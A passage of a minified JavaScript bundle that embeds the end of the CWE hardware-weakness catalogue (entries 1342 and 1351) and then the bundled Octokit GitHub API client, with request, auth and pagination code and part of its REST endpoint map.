access.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0551"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1202"}},{"attr":{"@_External_Reference_ID":"REF-1203"}},{"attr":{"@_External_Reference_ID":"REF-1204"}},{"attr":{"@_External_Reference_ID":"REF-1205"}}]},"Notes":{"Note":{"#text":"CWE-1342 differs from CWE-1303, which is related to misprediction and biasing microarchitectural components, while CWE-1342 addresses illegal data flows and retention. For example, Spectre is an instance of CWE-1303 biasing branch prediction to steer the transient execution indirectly.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anders Nordstrom, Alric Althoff","Submission_Organization":"Tortuga Logic","Submission_Date":"2021-09-22"}}},"1351":{"attr":{"@_ID":"1351","@_Name":"Improper Handling of Hardware Behavior in Exceptionally Cold Environments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A hardware device, or the firmware running on it, is\\n                missing or has incorrect protection features to maintain\\n                goals of security primitives when the device is cooled below\\n                standard operating temperatures.","Extended_Description":{"xhtml:p":["The hardware designer may improperly anticipate\\n                    hardware behavior when exposed to exceptionally cold\\n                    conditions. As a result they may introduce a weakness by not\\n                    accounting for the modified behavior of critical components\\n                    when in extreme environments.","An example of a change in behavior is that power loss\\n                    won\'t clear/reset any volatile state when cooled below\\n                    standard operating temperatures. This may result in\\n                    a weakness when the starting state of the volatile memory is\\n                    being relied upon for a security decision. For example, a\\n                    Physical Unclonable Function (PUF) may be supplied as a\\n                    security primitive to improve confidentiality,\\n                    authenticity, and integrity guarantees. However, when the\\n                    PUF is paired with DRAM, SRAM, or another temperature\\n                    sensitive entropy source, the system designer may introduce\\n                    weakness by failing to account for the chosen entropy\\n                    source\'s behavior at exceptionally low temperatures. In the\\n                    case of DRAM and SRAM, when power is cycled at low\\n                    temperatures, the device will not contain the bitwise\\n                    biasing caused by inconsistencies in manufacturing and will\\n                    instead contain the data from previous boot. Should the PUF\\n                    primitive be used in a cryptographic construction which\\n                    does not account for full adversary control of PUF seed\\n                    data, weakness would arise.","This weakness does not cover \\"Cold Boot Attacks\\"\\n                    wherein RAM or other external storage is super cooled and\\n                    read externally by an attacker."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":[{"attr":{"@_Class":"Embedded","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Microcomputer","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Authentication"],"Impact":["Varies by Context","Unexpected State"],"Likelihood":"Low","Note":"Consequences of this weakness are highly contextual."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"The system should account for security primitive behavior when cooled outside standard temperatures."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1181"}},{"attr":{"@_External_Reference_ID":"REF-1182"}},{"attr":{"@_External_Reference_ID":"REF-1183"}}]},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-10-23"}}}}');function jq(t,a,e,i,n,r,c){try{var d=t[r](c),T=d.value}catch(k){return void e(k)}d.done?a(T):Promise.resolve(T).then(i,n)}function f2(t){return function(){var a=this,e=arguments;return new Promise(function(i,n){var r=t.apply(a,e);function c(T){jq(r,i,n,c,d,"next",T)}function d(T){jq(r,i,n,c,d,"throw",T)}c(void 0)})}}var jb=de(5486);function mT(){return"object"==typeof navigator&&"userAgent"in navigator?navigator.userAgent:"object"==typeof jb&&"version"in jb?`Node.js/${jb.version.substr(1)} (${jb.platform}; ${jb.arch})`:"<environment undetectable>"}var vxe=de(2685);function Qq(t){return"[object Object]"===Object.prototype.toString.call(t)}function $q(t){var a,e;return!1!==Qq(t)&&(void 0===(a=t.constructor)||!(!1===Qq(e=a.prototype)||!1===e.hasOwnProperty("isPrototypeOf")))}function Kq(t,a){const e=Object.assign({},t);return Object.keys(a).forEach(i=>{$q(a[i])?i in t?e[i]=Kq(t[i],a[i]):Object.assign(e,{[i]:a[i]}):Object.assign(e,{[i]:a[i]})}),e}function Xq(t){for(const a in t)void 0===t[a]&&delete t[a];return t}function r5(t,a,e){if("string"==typeof a){let[n,r]=a.split(" ");e=Object.assign(r?{method:n,url:r}:{url:n},e)}else e=Object.assign({},a);e.headers=function Axe(t){return t?Object.keys(t).reduce((a,e)=>(a[e.toLowerCase()]=t[e],a),{}):{}}(e.headers),Xq(e),Xq(e.headers);const i=Kq(t||{},e);return t&&t.mediaType.previews.length&&(i.mediaType.previews=t.mediaType.previews.filter(n=>!i.mediaType.previews.includes(n)).concat(i.mediaType.previews)),i.mediaType.previews=i.mediaType.previews.map(n=>n.replace(/-preview/,"")),i}const Exe=/\{[^}]+\}/g;function Dxe(t){return t.replace(/^\W+|\W+$/g,"").split(/,/)}function Yq(t,a){return Object.keys(t).filter(e=>!a.includes(e)).reduce((e,i)=>(e[i]=t[i],e),{})}function Jq(t){return t.split(/(%[0-9A-Fa-f]{2})/g).map(function(a){return/%[0-9A-Fa-f]/.test(a)||(a=encodeURI(a).replace(/%5B/g,"[").replace(/%5D/g,"]")),a}).join("")}function p2(t){return encodeURIComponent(t).replace(/[!'()*]/g,function(a){return"%"+a.charCodeAt(0).toString(16).toUpperCase()})}function Qb(t,a,e){return a="+"===t||"#"===t?Jq(a):p2(a),e?p2(e)+"="+a:a}function _2(t){return null!=t}function s5(t){return";"===t||"&"===t||"?"===t}function Rxe(t,a){var e=["+","#",".","/",";","?","&"];return t.replace(/\{([^\{\}]+)\}|([^\{\}]+)/g,function(i,n,r){if(n){let d="";const T=[];if(-1!==e.indexOf(n.charAt(0))&&(d=n.charAt(0),n=n.substr(1)),n.split(/,/g).forEach(function(k){var q=/([^:\*]*)(?::(\d+)|(\*))?/.exec(k);T.push(function wxe(t,a,e,i){var n=t[e],r=[];if(_2(n)&&""!==n)if("string"==typeof n||"number"==typeof n||"boolean"==typeof n)n=n.toString(),i&&"*"!==i&&(n=n.substring(0,parseInt(i,10))),r.push(Qb(a,n,s5(a)?e:""));else if("*"===i)Array.isArray(n)?n.filter(_2).forEach(function(c){r.push(Qb(a,c,s5(a)?e:""))}):Object.keys(n).forEach(function(c){_2(n[c])&&r.push(Qb(a,n[c],c))});else{const c=[];Array.isArray(n)?n.filter(_2).forEach(function(d){c.push(Qb(a,d))}):Object.keys(n).forEach(function(d){_2(n[d])&&(c.push(p2(d)),c.push(Qb(a,n[d].toString())))}),s5(a)?r.push(p2(e)+"="+c.join(",")):0!==c.length&&r.push(c.join(","))}else";"===a?_2(n)&&r.push(p2(e)):""!==n||"&"!==a&&"?"!==a?""===n&&r.push(""):r.push(p2(e)+"=");return r}(a,d,q[1],q[2]||q[3]))}),d&&"+"!==d){var c=",";return"?"===d?c="&":"#"!==d&&(c=d),(0!==T.length?d:"")+T.join(c)}return T.join(",")}return Jq(r)})}function Zq(t){let n,a=t.method.toUpperCase(),e=(t.url||"/").replace(/:([a-z]\w+)/g,"{$1}"),i=Object.assign({},t.headers),r=Yq(t,["method","baseUrl","url","headers","request","mediaType"]);const c=function xxe(t){const a=t.match(Exe);return a?a.map(Dxe).reduce((e,i)=>e.concat(i),[]):[]}(e);e=function Ixe(t){return{expand:Rxe.bind(null,t)}}(e).expand(r),/^http/.test(e)||(e=t.baseUrl+e);const T=Yq(r,Object.keys(t).filter(q=>c.includes(q)).concat("baseUrl"));if(!/application\/octet-stream/i.test(i.accept)&&(t.mediaType.format&&(i.accept=i.accept.split(/,/).map(q=>q.replace(/application\/vnd(\.\w+)(\.v3)?(\.\w+)?(\+json)?$/,`application/vnd$1$2.${t.mediaType.format}`)).join(",")),t.mediaType.previews.length)){const q=i.accept.match(/[\w-]+(?=-preview)/g)||[];i.accept=q.concat(t.mediaType.previews).map(Y=>`application/vnd.github.${Y}-preview${t.mediaType.format?`.${t.mediaType.format}`:"+json"}`).join(",")}return["GET","HEAD"].includes(a)?e=function Txe(t,a){const e=/\?/.test(t)?"&":"?",i=Object.keys(a);return 0===i.length?t:t+e+i.map(n=>"q"===n?"q="+a.q.split("+").map(encodeURIComponent).join("+"):`${n}=${encodeURIComponent(a[n])}`).join("&")}(e,T):"data"in T?n=T.data:Object.keys(T).length&&(n=T),!i["content-type"]&&void 0!==n&&(i["content-type"]="application/json; charset=utf-8"),["PATCH","PUT"].includes(a)&&void 0===n&&(n=""),Object.assign({method:a,url:e,headers:i},void 0!==n?{body:n}:null,t.request?{request:t.request}:null)}function Sxe(t,a,e){return Zq(r5(t,a,e))}const Pxe=function eG(t,a){const e=r5(t,a),i=Sxe.bind(null,e);return Object.assign(i,{DEFAULTS:e,defaults:eG.bind(null,e),merge:r5.bind(null,e),parse:Zq})}(null,{method:"GET",baseUrl:"https://api.github.com",headers:{accept:"application/vnd.github.v3+json","user-agent":`octokit-endpoint.js/7.0.5 ${mT()}`},mediaType:{format:"",previews:[]}});var Oxe=de(8225),Nxe=de.n(Oxe);class tG extends Error{constructor(a){super(a),Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor),this.name="Deprecation"}}var Lxe=de(9885),iG=de.n(Lxe);const zxe=iG()(t=>console.warn(t)),Wxe=iG()(t=>console.warn(t));class $b extends Error{constructor(a,e,i){let n;super(a),Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor),this.name="HttpError",this.status=e,"headers"in i&&void 0!==i.headers&&(n=i.headers),"response"in i&&(this.response=i.response,n=i.response.headers);const r=Object.assign({},i.request);i.request.headers.authorization&&(r.headers=Object.assign({},i.request.headers,{authorization:i.request.headers.authorization.replace(/ .*$/," [REDACTED]")})),r.url=r.url.replace(/\bclient_secret=\w+/g,"client_secret=[REDACTED]").replace(/\baccess_token=\w+/g,"access_token=[REDACTED]"),this.request=r,Object.defineProperty(this,"code",{get:()=>(zxe(new tG("[@octokit/request-error] `error.code` is deprecated, use `error.status`.")),e)}),Object.defineProperty(this,"headers",{get:()=>(Wxe(new tG("[@octokit/request-error] `error.headers` is deprecated, use `error.response.headers`.")),n||{})})}}function Vxe(t){return t.arrayBuffer()}function aG(t){const a=t.request&&t.request.log?t.request.log:console;($q(t.body)||Array.isArray(t.body))&&(t.body=JSON.stringify(t.body));let i,n,e={};return(t.request&&t.request.fetch||globalThis.fetch||Nxe())(t.url,Object.assign(ZT({method:t.method,body:t.body,headers:t.headers,redirect:t.redirect},t.body&&{duplex:"half"}),t.request)).then(function(){var c=f2(function*(d){n=d.url,i=d.status;for(const T of d.headers)e[T[0]]=T[1];if("deprecation"in e){const T=e.link&&e.link.match(/<([^>]+)>; rel="deprecation"/),k=T&&T.pop();a.warn(`[@octokit/request] "${t.method} ${t.url}" is deprecated. It is scheduled to be removed on ${e.sunset}${k?`. See ${k}`:""}`)}if(204!==i&&205!==i){if("HEAD"===t.method){if(i<400)return;throw new $b(d.statusText,i,{response:{url:n,status:i,headers:e,data:void 0},request:t})}if(304===i)throw new $b("Not modified",i,{response:{url:n,status:i,headers:e,data:yield c5(d)},request:t});if(i>=400){const T=yield c5(d);throw new $b(function Bxe(t){return"string"==typeof t?t:"message"in t?Array.isArray(t.errors)?`${t.message}: ${t.errors.map(JSON.stringify).join(", ")}`:t.message:`Unknown error: ${JSON.stringify(t)}`}(T),i,{response:{url:n,status:i,headers:e,data:T},request:t})}return c5(d)}});return function(d){return c.apply(this,arguments)}}()).then(c=>({status:i,url:n,headers:e,data:c})).catch(c=>{throw c instanceof $b||"AbortError"===c.name?c:new $b(c.message,500,{request:t})})}function c5(t){return l5.apply(this,arguments)}function l5(){return(l5=f2(function*(t){const a=t.headers.get("content-type");return/application\/json/.test(a)?t.json():!a||/^text\/|charset=utf-8$/.test(a)?t.text():Vxe(t)})).apply(this,arguments)}var m5=function d5(t,a){const e=t.defaults(a);return Object.assign(function(n,r){const c=e.merge(n,r);if(!c.request||!c.request.hook)return aG(e.parse(c));const d=(T,k)=>aG(e.parse(e.merge(T,k)));return Object.assign(d,{endpoint:e,defaults:d5.bind(null,e)}),c.request.hook(d,c)},{endpoint:e,defaults:d5.bind(null,e)})}(Pxe,{headers:{"user-agent":`octokit-request.js/6.2.5 ${mT()}`}}),qxe=class extends Error{constructor(t,a,e){super(function Uxe(t){return"Request failed due to following response errors:\n"+t.errors.map(a=>` - ${a.message}`).join("\n")}(e)),this.request=t,this.headers=a,this.response=e,this.name="GraphqlResponseError",this.errors=e.errors,this.data=e.data,Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor)}},Gxe=["method","baseUrl","url","headers","request","query","mediaType"],jxe=["query","method","url"],nG=/\/api\/v3\/?$/;function u5(t,a){const e=t.defaults(a);return Object.assign((n,r)=>function Qxe(t,a,e){if(e){if("string"==typeof a&&"query"in e)return Promise.reject(new Error('[@octokit/graphql] "query" cannot be used as variable name'));for(const c in e)if(jxe.includes(c))return Promise.reject(new Error(`[@octokit/graphql] "${c}" cannot be used as variable name`))}const i="string"==typeof a?Object.assign({query:a},e):a,n=Object.keys(i).reduce((c,d)=>Gxe.includes(d)?(c[d]=i[d],c):(c.variables||(c.variables={}),c.variables[d]=i[d],c),{}),r=i.baseUrl||t.endpoint.DEFAULTS.baseUrl;return nG.test(r)&&(n.url=r.replace(nG,"/api/graphql")),t(n).then(c=>{if(c.data.errors){const d={};for(const T of Object.keys(c.headers))d[T]=c.headers[T];throw new qxe(n,d,c.data)}return c.data.data})}(e,n,r),{defaults:u5.bind(null,e),endpoint:e.endpoint})}u5(m5,{headers:{"user-agent":`octokit-graphql.js/5.0.6 ${mT()}`},method:"POST",url:"/graphql"});const Kxe=/^v1\./,Xxe=/^ghs_/,Yxe=/^ghu_/;function Jxe(t){return h5.apply(this,arguments)}function h5(){return(h5=f2(function*(t){const a=3===t.split(/\./).length,e=Kxe.test(t)||Xxe.test(t),i=Yxe.test(t);return{type:"token",token:t,tokenType:a?"app":e?"installation":i?"user-to-server":"oauth"}})).apply(this,arguments)}function Zxe(t){return 3===t.split(/\./).length?`bearer ${t}`:`token ${t}`}function ewe(t,a,e,i){return f5.apply(this,arguments)}function f5(){return(f5=f2(function*(t,a,e,i){const n=a.endpoint.merge(e,i);return n.headers.authorization=Zxe(t),a(n)})).apply(this,arguments)}const twe=function(a){if(!a)throw new Error("[@octokit/auth-token] No token passed to createTokenAuth");if("string"!=typeof a)throw new Error("[@octokit/auth-token] Token passed to createTokenAuth is not a string");return a=a.replace(/^(token|bearer) +/i,""),Object.assign(Jxe.bind(null,a),{hook:ewe.bind(null,a)})};var p5=class{static defaults(t){return class extends(this){constructor(...e){const i=e[0]||{};super("function"!=typeof t?Object.assign({},t,i,i.userAgent&&t.userAgent?{userAgent:`${i.userAgent} ${t.userAgent}`}:null):t(i))}}}static plugin(...t){var a;const e=this.plugins;return(a=class extends(this){}).plugins=e.concat(t.filter(n=>!e.includes(n))),a}constructor(t={}){const a=new vxe.Collection,e={baseUrl:m5.endpoint.DEFAULTS.baseUrl,headers:{},request:Object.assign({},t.request,{hook:a.bind(null,"request")}),mediaType:{previews:[],format:""}};if(e.headers["user-agent"]=[t.userAgent,`octokit-core.js/4.2.1 ${mT()}`].filter(Boolean).join(" "),t.baseUrl&&(e.baseUrl=t.baseUrl),t.previews&&(e.mediaType.previews=t.previews),t.timeZone&&(e.headers["time-zone"]=t.timeZone),this.request=m5.defaults(e),this.graphql=function $xe(t){return u5(t,{method:"POST",url:"/graphql"})}(this.request).defaults(e),this.log=Object.assign({debug:()=>{},info:()=>{},warn:console.warn.bind(console),error:console.error.bind(console)},t.log),this.hook=a,t.authStrategy){const n=t,{authStrategy:r}=n,c=JZ(n,["authStrategy"]),d=r(Object.assign({request:this.request,log:this.log,octokit:this,octokitOptions:c},t.auth));a.wrap("request",d.hook),this.auth=d}else if(t.auth){const r=twe(t.auth);a.wrap("request",r.hook),this.auth=r}else this.auth=f2(function*(){return{type:"unauthenticated"}});this.constructor.plugins.forEach(r=>{Object.assign(this,r(this,t))})}};function rG(t){t.hook.wrap("request",(a,e)=>{t.log.debug("request",e);const i=Date.now(),n=t.request.endpoint.parse(e),r=n.url.replace(e.baseUrl,"");return a(e).then(c=>(t.log.info(`${n.method} ${r} - ${c.status} in ${Date.now()-i}ms`),c)).catch(c=>{throw t.log.info(`${n.method} ${r} - ${c.status} in ${Date.now()-i}ms`),c})})}function _5(t,a,e){const i="function"==typeof a?a.endpoint(e):t.request.endpoint(a,e),n="function"==typeof a?a:t.request,r=i.method,c=i.headers;let d=i.url;return{[Symbol.asyncIterator]:()=>({next:()=>f2(function*(){if(!d)return{done:!0};try{const k=function nwe(t){if(!t.data)return L7(ZT({},t),{data:[]});if(!("total_count"in t.data)||"url"in t.data)return t;const e=t.data.incomplete_results,i=t.data.repository_selection,n=t.data.total_count;delete t.data.incomplete_results,delete t.data.repository_selection,delete t.data.total_count;const r=Object.keys(t.data)[0];return t.data=t.data[r],void 0!==e&&(t.data.incomplete_results=e),void 0!==i&&(t.data.repository_selection=i),t.data.total_count=n,t}(yield n({method:r,url:d,headers:c}));return d=((k.headers.link||"").match(/<([^>]+)>;\s*rel="next"/)||[])[1],{value:k}}catch(T){if(409!==T.status)throw T;return d="",{value:{status:200,headers:{},data:[]}}}})()})}}function sG(t,a,e,i){return"function"==typeof e&&(i=e,e=void 0),cG(t,[],_5(t,a,e)[Symbol.asyncIterator](),i)}function cG(t,a,e,i){return e.next().then(n=>{if(n.done)return a;let r=!1;return a=a.concat(i?i(n.value,function c(){r=!0}):n.value.data),r?a:cG(t,a,e,i)})}function lG(t){return{paginate:Object.assign(sG.bind(null,t),{iterator:_5.bind(null,t)})}}p5.VERSION="4.2.1",p5.plugins=[],rG.VERSION="1.0.4",Object.assign(sG,{iterator:_5}),lG.VERSION="5.0.1";const dG={actions:{addCustomLabelsToSelfHostedRunnerForOrg:["POST /orgs/{org}/actions/runners/{runner_id}/labels"],addCustomLabelsToSelfHostedRunnerForRepo:["POST /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],addSelectedRepoToOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}/repositories/{repository_id}"],approveWorkflowRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/approve"],cancelWorkflowRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/cancel"],createOrUpdateEnvironmentSecret:["PUT /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],createOrUpdateOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/actions/secrets/{secret_name}"],createRegistrationTokenForOrg:["POST /orgs/{org}/actions/runners/registration-token"],createRegistrationTokenForRepo:["POST /repos/{owner}/{repo}/actions/runners/registration-token"],createRemoveTokenForOrg:["POST /orgs/{org}/actions/runners/remove-token"],createRemoveTokenForRepo:["POST /repos/{owner}/{repo}/actions/runners/remove-token"],createWorkflowDispatch:["POST /repos/{owner}/{repo}/actions/workflows/{workflow_id}/dispatches"],deleteActionsCacheById:["DELETE /repos/{owner}/{repo}/actions/caches/{cache_id}"],deleteActionsCacheByKey:["DELETE /repos/{owner}/{repo}/actions/caches{?key,ref}"],deleteArtifact:["DELETE /repos/{owner}/{repo}/actions/artifacts/{artifact_id}"],deleteEnvironmentSecret:["DELETE /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],deleteOrgSecret:["DELETE /orgs/{org}/actions/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/actions/secrets/{secret_name}"],deleteSelfHostedRunnerFromOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}"],deleteSelfHostedRunnerFromRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}"],deleteWorkflowRun:["DELETE /repos/{owner}/{repo}/actions/runs/{run_id}"],deleteWorkflowRunLogs:["DELETE /repos/{owner}/{repo}/actions/runs/{run_id}/logs"],disableSelectedRepositoryGithubActionsOrganization:["DELETE /orgs/{org}/actions/permissions/repositories/{repository_id}"],disableWorkflow:["PUT /repos/{owner}/{repo}/actions/workflows/{workflow_id}/disable"],downloadArtifact:["GET /repos/{owner}/{repo}/actions/artifacts/{artifact_id}/{archive_format}"],downloadJobLogsForWorkflowRun:["GET /repos/{owner}/{repo}/actions/jobs/{job_id}/logs"],downloadWorkflowRunAttemptLogs:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}/logs"],downloadWorkflowRunLogs:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/logs"],enableSelectedRepositoryGithubActionsOrganization:["PUT /orgs/{org}/actions/permissions/repositories/{repository_id}"],enableWorkflow:["PUT /repos/{owner}/{repo}/actions/workflows/{workflow_id}/enable"],getActionsCacheList:["GET /repos/{owner}/{repo}/actions/caches"],getActionsCacheUsage:["GET /repos/{owner}/{repo}/actions/cache/usage"],getActionsCacheUsageByRepoForOrg:["GET /orgs/{org}/actions/cache/usage-by-repository"],getActionsCacheUsageForEnterprise:["GET /enterprises/{enterprise}/actions/cache/usage"],getActionsCacheUsageForOrg:["GET /orgs/{org}/actions/cache/usage"],getAllowedActionsOrganization:["GET /orgs/{org}/actions/permissions/selected-actions"],getAllowedActionsRepository:["GET /repos/{owner}/{repo}/actions/permissions/selected-actions"],getArtifact:["GET /repos/{owner}/{repo}/actions/artifacts/{artifact_id}"],getEnvironmentPublicKey:["GET /repositories/{repository_id}/environments/{environment_name}/secrets/public-key"],getEnvironmentSecret:["GET /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],getGithubActionsDefaultWorkflowPermissionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/workflow"],getGithubActionsDefaultWorkflowPermissionsOrganization:["GET /orgs/{org}/actions/permissions/workflow"],getGithubActionsDefaultWorkflowPermissionsRepository:["GET /repos/{owner}/{repo}/actions/permissions/workflow"],getGithubActionsPermissionsOrganization:["GET /orgs/{org}/actions/permissions"],getGithubActionsPermissionsRepository:["GET /repos/{owner}/{repo}/actions/permissions"],getJobForWorkflowRun:["GET /repos/{owner}/{repo}/actions/jobs/{job_id}"],getOrgPublicKey:["GET /orgs/{org}/actions/secrets/public-key"],getOrgSecret:["GET /orgs/{org}/actions/secrets/{secret_name}"],getPendingDeploymentsForRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/pending_deployments"],getRepoPermissions:["GET /repos/{owner}/{repo}/actions/permissions",{},{renamed:["actions","getGithubActionsPermissionsRepository"]}],getRepoPublicKey:["GET /repos/{owner}/{repo}/actions/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/actions/secrets/{secret_name}"],getReviewsForRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/approvals"],getSelfHostedRunnerForOrg:["GET /orgs/{org}/actions/runners/{runner_id}"],getSelfHostedRunnerForRepo:["GET /repos/{owner}/{repo}/actions/runners/{runner_id}"],getWorkflow:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}"],getWorkflowAccessToRepository:["GET /repos/{owner}/{repo}/actions/permissions/access"],getWorkflowRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}"],getWorkflowRunAttempt:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}"],getWorkflowRunUsage:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/timing"],getWorkflowUsage:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}/timing"],listArtifactsForRepo:["GET /repos/{owner}/{repo}/actions/artifacts"],listEnvironmentSecrets:["GET /repositories/{repository_id}/environments/{environment_name}/secrets"],listJobsForWorkflowRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/jobs"],listJobsForWorkflowRunAttempt:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}/jobs"],listLabelsForSelfHostedRunnerForOrg:["GET /orgs/{org}/actions/runners/{runner_id}/labels"],listLabelsForSelfHostedRunnerForRepo:["GET /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],listOrgSecrets:["GET /orgs/{org}/actions/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/actions/secrets"],listRepoWorkflows:["GET /repos/{owner}/{repo}/actions/workflows"],listRunnerApplicationsForOrg:["GET /orgs/{org}/actions/runners/downloads"],listRunnerApplicationsForRepo:["GET /repos/{owner}/{repo}/actions/runners/downloads"],listSelectedReposForOrgSecret:["GET /orgs/{org}/actions/secrets/{secret_name}/repositories"],listSelectedRepositoriesEnabledGithubActionsOrganization:["GET /orgs/{org}/actions/permissions/repositories"],listSelfHostedRunnersForOrg:["GET /orgs/{org}/actions/runners"],listSelfHostedRunnersForRepo:["GET /repos/{owner}/{repo}/actions/runners"],listWorkflowRunArtifacts:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/artifacts"],listWorkflowRuns:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}/runs"],listWorkflowRunsForRepo:["GET /repos/{owner}/{repo}/actions/runs"],reRunJobForWorkflowRun:["POST /repos/{owner}/{repo}/actions/jobs/{job_id}/rerun"],reRunWorkflow:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/rerun"],reRunWorkflowFailedJobs:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/rerun-failed-jobs"],removeAllCustomLabelsFromSelfHostedRunnerForOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}/labels"],removeAllCustomLabelsFromSelfHostedRunnerForRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],removeCustomLabelFromSelfHostedRunnerForOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}/labels/{name}"],removeCustomLabelFromSelfHostedRunnerForRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}/labels/{name}"],removeSelectedRepoFromOrgSecret:["DELETE /orgs/{org}/actions/secrets/{secret_name}/repositories/{repository_id}"],reviewPendingDeploymentsForRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/pending_deployments"],setAllowedActionsOrganization:["PUT /orgs/{org}/actions/permissions/selected-actions"],setAllowedActionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions/selected-actions"],setCustomLabelsForSelfHostedRunnerForOrg:["PUT /orgs/{org}/actions/runners/{runner_id}/labels"],setCustomLabelsForSelfHostedRunnerForRepo:["PUT /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],setGithubActionsDefaultWorkflowPermissionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/workflow"],setGithubActionsDefaultWorkflowPermissionsOrganization:["PUT /orgs/{org}/actions/permissions/workflow"],setGithubActionsDefaultWorkflowPermissionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions/workflow"],setGithubActionsPermissionsOrganization:["PUT /orgs/{org}/actions/permissions"],setGithubActionsPermissionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions"],setSelectedReposForOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}/repositories"],setSelectedRepositoriesEnabledGithubActionsOrganization:["PUT /orgs/{org}/actions/permissions/repositories"],setWorkflowAccessToRepository:["PUT /repos/{owner}/{repo}/actions/permissions/access"]},activity:{checkRepoIsStarredByAuthenticatedUser:["GET /user/starred/{owner}/{repo}"],deleteRepoSubscription:["DELETE /repos/{owner}/{repo}/subscription"],deleteThreadSubscription:["DELETE /notifications/threads/{thread_id}/subscription"],getFeeds:["GET /feeds"],getRepoSubscription:["GET /repos/{owner}/{repo}/subscription"],getThread:["GET /notifications/threads/{thread_id}"],getThreadSubscriptionForAuthenticatedUser:["GET /notifications/threads/{thread_id}/subscription"],listEventsForAuthenticatedUser:["GET /users/{username}/events"],listNotificationsForAuthenticatedUser:["GET /notifications"],listOrgEventsForAuthenticatedUser:["GET /users/{username}/events/orgs/{org}"],listPublicEvents:["GET /events"],listPublicEventsForRepoNetwork:["GET /networks/{owner}/{repo}/events"],listPublicEventsForUser:["GET /users/{username}/events/public"],listPublicOrgEvents:["GET /orgs/{org}/events"],listReceivedEventsForUser:["GET /users/{username}/received_events"],listReceivedPublicEventsForUser:["GET /users/{username}/received_events/public"],listRepoEvents:["GET /repos/{owner}/{repo}/events"],listRepoNotificationsForAuthenticatedUser:["GET /repos/{owner}/{repo}/notifications"],listReposStarredByAuthenticatedUser:["GET /user/starred"],listReposStarredByUser:["GET /users/{username}/starred"],listReposWatchedByUser:["GET /users/{username}/subscriptions"],listStargazersForRepo:["GET /repos/{owner}/{repo}/stargazers"],listWatchedReposForAuthenticatedUser:["GET /user/subscriptions"],listWatchersForRepo:["GET /repos/{owner}/{repo}/subscribers"],markNotificationsAsRead:["PUT /notifications"],markRepoNotificationsAsRead:["PUT /repos/{owner}/{repo}/notifications"],markThreadAsRead:["PATCH /notifications/threads/{thread_id}"],setRepoSubscription:["PUT /repos/{owner}/{repo}/subscription"],setThreadSubscription:["PUT /notifications/threads/{thread_id}/subscription"],starRepoForAuthenticatedUser:["PUT /user/starred/{owner}/{repo}"],unstarRepoForAuthenticatedUser:["DELETE /user/starred/{owner}/{repo}"]},apps:{addRepoToInstallation:["PUT /user/installations/{installation_id}/repositories/{repository_id}",{},{renamed:["apps","addRepoToInstallationForAuthenticatedUser"]}],addRepoToInstallationForAuthenticatedUser:["PUT /user/installations/{installation_id}/repositories/{repository_id}"],checkToken:["POST /applications/{client_id}/token"],createFromManifest:["POST 